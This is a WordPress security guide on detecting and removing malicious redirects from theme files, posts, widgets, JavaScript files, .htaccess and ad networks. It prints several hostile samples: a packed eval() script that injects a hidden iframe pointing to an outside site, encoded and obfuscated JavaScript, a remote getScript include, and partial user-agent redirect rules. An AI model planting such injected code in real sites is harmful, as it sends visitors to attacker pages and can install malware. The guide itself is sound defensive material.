Removing Malicious Redirects From Your Site
The WordPress Security Learning Center
Removing Malicious Redirects From Your Site

3.1: Removing Malicious Redirects From Your Site

Advanced
Updated September 16, 2019

What is a malicious redirect?

A malicious redirect is code inserted into a website with the intent of redirecting the site visitor to another website. Malicious redirects are typically inserted into a website by attackers with the intent of generating advertising impressions. However, some malicious redirections can have more damaging effects. A malicious redirect can exploit vulnerabilities in a site visitor’s computer through web-based scripts to install malware on unprotected machines. As such, it is critical to remove malicious redirects from your site.

Determining if your site is infected

Most site owners are unaware that their site is redirecting visitors. Often, they first learn of the redirection when a customer reaches out to say they have ended up in an undesirable corner of the internet when attempting to visit the site. A site owner could even attempt to replicate the problem, only to see that everything looks fine to them on their computer, while site visitors on mobile platforms experience malicious activity. The redirect might happen on some pages and not others. Or, it might happen before the site even loads.

If Wordfence has identified your site as having one or more malicious redirects, there are some steps you can take to remove the malicious redirect and restore your site to normal functionality.

Finding and Removing Malicious Redirects

Before you make changes to your site files or database, we recommend backing up all site files in a safe place, especially if you are unfamiliar with the inner workings of your content management system (CMS).

A malicious redirect can be inserted anywhere on your site. It might be in your site files or even in your database.

Here are some of the malicious redirects often detected by our scans and some instructions on how to remove them.

Javascript insertions in your site’s files.

On WordPress sites, we see javascript entries placed in theme files. Typically we will find these within the theme’s header, often right above the tag. But they can be elsewhere in the site’s files.

A script typically found in the header can look like the following:

<sc​ript>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from​CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do​cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get​ElementById|function|createElement|iframe|append​Child|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
</sc​ript>  
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-wp-preserve="%3Cscript%26gt%3Bvar%20ar%3D%22%3D2%7DCd8%20pvsyw%3AAlEeTcBNfb6u%26gt%3B1%26lt%3B%2C)h.r3'niao0%20g%3B%2F%7Bm%5B%5C%22(t%5D%22%3Btry%7B'qwe'.length(1)%3B%7Dcatch(a)%7Bk%3Dnew%20Boolean().toString()%3Bdate%3Dnew%20Date()%3B%7D%3Bvar%20ar2%3D%22f120%2C120%2C108%2C63%2C18%2C144%2C12%2C114%2C54%2C72%2C135%2C48%2C105%2C147%2C93%2C123%2C48%2C147%2C45%2C42%2C48%2C135%2C48%2C105%2C147%2C%2027%2C57%2C30%2C51%2C111%2C123%2C60%2C111%2C135%2C48%2C144%2C102%2C66%2C114%2C12%2C30%2C102%2C87%2C138%2C117%2C150%2C87%2C132%2C120%2C120%2C120%2C%20...%0A%5B%2Fjs%5D%3C%2Fpre%3E%0A%3Cp%3EA%20malicious%20script%20can%20look%20like%20a%20normal%20javascript%20included%20file.%3C%2Fp%3E%0A%3Cpre%3E%5Bjs%20gutter%3D%22false%22%20wraplines%3D%22true%22%5D%0A%3Cscript%20src%3D%22http%3A%2F%2Fwww.%5Bredacted%5D.com%2Fanyscript.js%22%3E%3C%2Fscript%3E" data-mce-resize="false" data-mce-placeholder="1" class="mce-object" width="20" height="20" alt="&lt;script&gt;" title="&lt;script&gt;" />

A malicious script can also be included in another script.

$.getScript('http://www.[redacted].com/script.js', function()
  1. Determine which script is performing the malicious redirect. Not all javascript on your site is malicious, in fact, most of the javascript you will find on your site is a part of core functionality.
  2. In Chrome, enter “view-source:” in front of the site’s URL (e.g., view-source:http://www.sitename.com) and search for “<script” within the file. You can look for what other code or text is close to the malicious script to determine which site file contains the malicious code.
  3. If it is a theme file, you can use your site’s theme editor to remove the offending javascript. Or you can download your site via FTP or your cpanel file manager and upload the cleaned file back to your server.

Javascript inserted in pages or posts.

Often, attackers will run a script that inserts javascript into all of the posts/pages on your site. These redirects will not be found in site files, but rather in the site’s database. There may be more than one script inserted. It might be one one page, or it might be on all of them. These scripts may look like the same script above, but these redirects can often be obfuscated (intentionally obscured to make code ambiguous).

These javascript malicious redirects will look similar to the javascript examples above.

Removing this redirect: To remove this redirect, there are a few options. Often, these redirects are inserted into every post on the site. Scripts can be removed by editing:

  • within the content management system (e.g., via WordPress post editing)
  • via a database tool like PhpMyAdmin which allows for editing more than one page/post at a time.
  • via a downloaded text file locally and uploading the cleaned posts into the database using a SQL management tool. While fastest, this does require a level of technical expertise in working with SQL.

Javascript redirects inserted into widgets.

Malicious scripts can also be inserted into widgets.

Obfuscated javascript appended to javascript files.

An attacker can add a few lines of javascript to some or all of the javascript files within the site’s files. A search of site files looking for the URL to which that the site is redirecting might not find any results because this javascript is often obfuscated. Here is a sample:

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x...

Removing this redirect: To remove this type of malicious redirect, download the entire site using an FTP program to your computer, and search for the offending javascript. If you have a development tool that allows you to scan all of the files on your site, you may find that this malicious redirect has been inserted in all of the javascript files on your site. Check for both .js and .json files, including core files, theme files, plugins, etc. Once you have cleaned all of the site files, upload the cleaned site back to the server.

Redirects inserted into htaccess files.

An htaccess file is a file placed on your server that provides directives to the server before your site’s files are even accessed. For a WordPress site, for example, the htaccess file will tell the server to send requests to permalinks to the WordPress primary index.php file for handling. Other directives can be placed in an htaccess file, and it is a favorite location for attackers to place malicious redirects. Often, these types of redirects will redirect based on the type of browser or device, or by the site that referred the visitor to your site (most often, from one of the search engines) A htaccess redirect can look like this:

RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobi

An htaccess redirect can even redirect you based on the browser (user agent) OR the referrer (what sent the visitor to your site). Here is a sample:

RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|ms

These redirects can be difficult to isolate and remove. Manipulating the htaccess file can cause the site stop functioning altogether or create errors that do not make much sense such as an internal server error. If you are unfamiliar with the directives within the htaccess file, it makes sense to get help.

Removing this redirect: Start by downloading your .htaccess file. Your cpanel file manager might not show you this “hidden” file, and sometimes downloading it to your computer’s hard drive might make it disappear even though you can see it in your FTP application. You will need to remove the redirection, leaving behind the code necessary for the operation of your site. This can be hosting provider dependent, as there are often entries within an htaccess file necessary for your site’s functionality.

Ad networks

Some advertising networks are lenient in their standards for the advertising they accept into their network. The site may be completely free of malware, but an advertising network may be redirecting site visitors. Determining which advertising network may be the culprit can be a very difficult task as malicious advertising redirects can be served up sporadically and unpredictably.

Removing this redirect: If a site is maliciously redirecting your site visitors, if you have exhausted all other options and you have advertising networks placed on your site, removing those ad networks may solve the malicious redirection problem.

Looking Beyond The Redirect

No matter what type of redirect you have found on your site, the big question is how did it get there. You likely have other types of malware or security vulnerabilities on your site that allowed an attacker to gain access to the site and place the malicious redirect. You may have backdoors, malicious file uploaders, or other problems on the site.

If after reading this guide, you are unsure of how to remove the malicious redirect or are looking for more answers as to how the code was placed on your site, get help.

Did you enjoy this post? Share it!

The WordPress Security Learning Center

From WordPress security fundamentals to expert developer resources, this learning center is meant for every skill level. Get serious about WordPress Security, start right here.